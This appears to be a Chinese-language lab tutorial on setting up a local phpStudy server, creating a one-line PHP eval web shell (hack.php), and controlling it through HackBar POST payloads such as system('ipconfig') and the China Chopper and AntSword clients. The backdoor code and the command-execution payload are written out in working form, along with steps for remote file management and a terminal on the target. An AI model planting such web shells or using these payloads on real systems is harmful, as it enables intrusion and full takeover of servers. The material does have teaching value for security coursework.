本次课程需要用到的工具:phpStudy蚁剑中国菜刀

1.配置Web环境

打开phpStudy启动服务,使得界面的运行状态全部变成绿色,此时可以在浏览器使用127.0.0.1访问Web服务

image-20200630171628057

2.创建木马文件

在phpStudy的界面点击其他选项菜单进入网站的根目录

image-20200630171843749

在根目录中新建一个PHP的一句话木马文件,命名为hack.php,里面添加木马语句

1
<?php @eval($_POST['aaa']);?>

保存后退出编辑即可

3.利用Webshell

1)使用HackBar插件

在浏览器中安装HackBar插件,按F12打开开发者工具,访问http://127.0.0.1/hack.php界面不会显示任何东西

然后点开开发者工具中的HackBar选项卡,将地址栏中的地址粘贴在下面,选中Post Data选项在下面填入aaa=system('ipconfig');,其中这里的aaa是上面在创建木马文件的时候POST里面的参数

image-20200630173613310

填写完毕后点击Execution就可以通过木马执行服务器中的命令,就可以直接在Web页面看到命令执行后的结果

image-20200630173748175

2)使用中国菜刀

打开中国菜刀首先添加一条记录,右键添加

如图所示,先在地址栏填写一句话木马的URL,后面的框填写木马中POST里面设置的参数,完成后点击添加

image-20200630174244012

添加后在菜刀的主界面就会出现一条记录,右键这条记录就可以以不同的方式连接到Web服务器主机

image-20200630174729709

可以通过文件管理对目标主机中的任意文件进行操作,通过虚拟终端可以通过命令行的形式对目标主机进行操控

文件管理

命令行控制

3)使用蚁剑

使用方法与中国菜刀基本相同

image-20200630175617736